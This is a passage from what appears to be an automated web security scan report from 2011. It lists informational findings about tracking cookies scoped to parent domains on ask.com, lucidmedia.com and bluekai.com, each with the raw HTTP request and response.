Cookie: bkp1=; bku=3yG99JRcc6fbvHWp; bko=KJpEWVjQSnmN2tBAAmPMRJMT653wCDWupQ/9PDys9x==; bkw5=KJpMLV/9QCL1JT9A1TMJy1Myk6zZQjaOW6ZsWuTMozf/R/9AyyvU6UJQjsQs0MY0l/Yv/z+Ttun61vsR8ZRwR3wg9zZLX9P0asXpYviehvqbQACmngzsOGSt/ahboGqCzQW9tmL5kx==; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRx1pdDQUwy9bB9E0; bklc=4e48bee4; bk=f1FCO9v8mq65PvUy; bkc=KJh56e2n96WxO4Yl8hAN0DkLHHEXz6n9/kU9/psYus0rmytG/9CIY6W/vAAHW/vY35BGZDoHyHHI9eLnH5OsL5OvYOizVqwhJ+U0R2dLL1IJ9ItWyZkbhPz9cwJlHcgeH+4PsO9jPci20Uz2kT/y8TtcGLekYjOjIF5+DUo8E8owTpzcYmGvO8AaFy2aklNHCMeF1hT7atRDfF/8lXnSYwFeCEe7Mjr6n2TWpZiK2fsp1V7msNIHqzgU0OqKAIpeuV7mstX7bnX+CKwmwc+3OXvzBdbCFLKta/bIwJod6AfZov25bKKtyF3782+T6Hb5kqb4kkTLxjMlCdNRIz+q8BRyLwZQ1vd5gNlGzDOdeoF41bq3A56a6isFH3VecFmXXE75BHgDpXYWfG4+fDFgdMgIOUF2AVD=; bkst=KJyPMMNmx6W1CatAQMyJYKoD+Ojgf23fni/v/Qauk/SvXrN4uz5Bu/GzQE1QYL8Yy0lRB2PG2W74gmeg9ASmII4eY78sFTPi6HzlHI0PYTRiQgAbHSZJVRV1zFfzlQdITlnCD0Y4SpBAjTqOph6pDXeDV6FumiKklII7yD2gQsFyTANanSC8W7P3KGbn4M1OgWcN8uc+cy2FftJlgfrhd6tnHAm1DAih51ARGMP1tEaVGo7jK3L8qcKnokyOl99fnibJIA0PR6CLJv5hIhXcypqF; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:26:20 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=BtQwCxv8mq65PvUy; expires=Sat, 11-Feb-2012 18:26:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56nNnyN9DO4epSZp+k2HPH1swY/DmEQPeSyVH5LAVnSQQvwTUOSsGbY9/G3Ypih6fvV3hQTmMVTKvG/FiGJBxLcMF6t5pmTD4mzk8f2xixnQmkBRnqQ9vB4J2u7gjbFivqacIBeBe4Ar056SkmVXzMyc+C1JJrr939m0FGeE7MxIMxnOwTKDZdIdDa/x8qh0ZFL+M/ewUXVNjK78EZodsglc9mNwRoFwtGs0pndRQpclsyIEiC1J5wA4lVhhQF2Lx8ghh74oi+Bz84z22fshDZFwsSyAb46FC0mKhexCplFiq2C+SPEMT5vMFDErjAfbtojdSYAL4MZFCVU+yDFoCUcotaXnzfl5pdpz4/n4bQjVsygHtglSh0hf5tVdI7paBiVyJuwrXWJctrLp4sN4GUqPvITHs2e8Lj6+Sfd47cl/WZk1=; expires=Sat, 11-Feb-2012 18:26:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJykMpNmQpW1CMB6Q7TuDMLpLPgWErpWxXUxuGeD5Zaidw/lL7WERm9/79sOh1yhVnQaiUQ70IXMw4qYFJIR7r42fUaCwFrXB+LetwIQJlVAx4YfMwbg2hzZSlejpQaSGxyI1613PGOnJOJshjEKBkK54pG54wEGD3AvjaUOrfkO/FxxVbtHSb1GIwBh6dkoSzpvmcR3nmoacqJRDUABxlXIsq16/74qrnXIwM00U+fFIF8lsCgh/UOsQ5yTQx2S/ujnDOO7/ZtNJndjeD6IstIuoVyMi6+RvwC/iFpupdTeydy2L9==; expires=Sat, 11-Feb-2012 18:26:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 16-Aug-2011 18:26:20 GMT; path=/; domain=.bluekai.com
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

12.47. http://user.lucidmedia.com/clicksense/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=a371b4911c4e5b09&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=36OwoKhw1oP

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:41:25 GMT
Expires: Mon, 15 Aug 2011 18:41:25 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=36OwoKhw1oP; Domain=.lucidmedia.com; Expires=Tue, 14-Aug-2012 18:41:25 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3574436734868397339
Content-Length: 0
Connection: close


12.48. http://www.ask.com/about/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/help HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/ask-site-policies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRwpcQDkAACJXoqMAAAD5
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 48733
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:55 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Help Center</title>


<link href="http://
...[SNIP]...

12.49. http://www.ask.com/about/help/webmasters  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help/webmasters

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/help/webmasters HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnTgpcQDYAAEsEKyYAAAD-
from-tr: trafrt006iad.io.askjeeves.info
Content-Length: 48732
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:02 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:02 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Webmasters</title>


<link href="http://w
...[SNIP]...

12.50. http://www.ask.com/about/legal/ask-site-policies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/ask-site-policies

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/legal/ask-site-policies HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjMyLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRgpcQXEAAHdxrIgAAAAW
from-tr: trafrt003iad.io.askjeeves.info
Cache-Control: private
Content-Length: 49517
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:54 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:54 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Ask Site Policies</title>


<link href="h
...[SNIP]...

12.51. http://www.ask.com/about/legal/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/privacy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; qc=0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA2LVVUQw%3D%3D&po=0&pp=dir; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllOgpcQKMAAFY@qX8AAAEd
from-tr: trafrt011iad.io.askjeeves.info
Cache-Control: private
Content-Length: 46328
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:11 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Privacy Policy</title>


<link href="http
...[SNIP]...

12.52. http://www.ask.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllCApcQXAAAHyEWgcAAABd
from-tr: trafrt002iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77175
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:20 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:20 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...

12.53. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: Tklk8ApcQKMAAFY@f2wAAAEE
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 115264
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:56 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...

12.54. http://www.ask.com/products/display  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /products/display

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/display HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjUxLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllMQpcQKMAAFY@o5AAAAEL
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 39615
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:01 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:01 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>Advertise - Ask.com</title>


<link href="http://www.ask
...[SNIP]...

12.55. http://www.ask.com/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...

12.56. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_helpcenter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
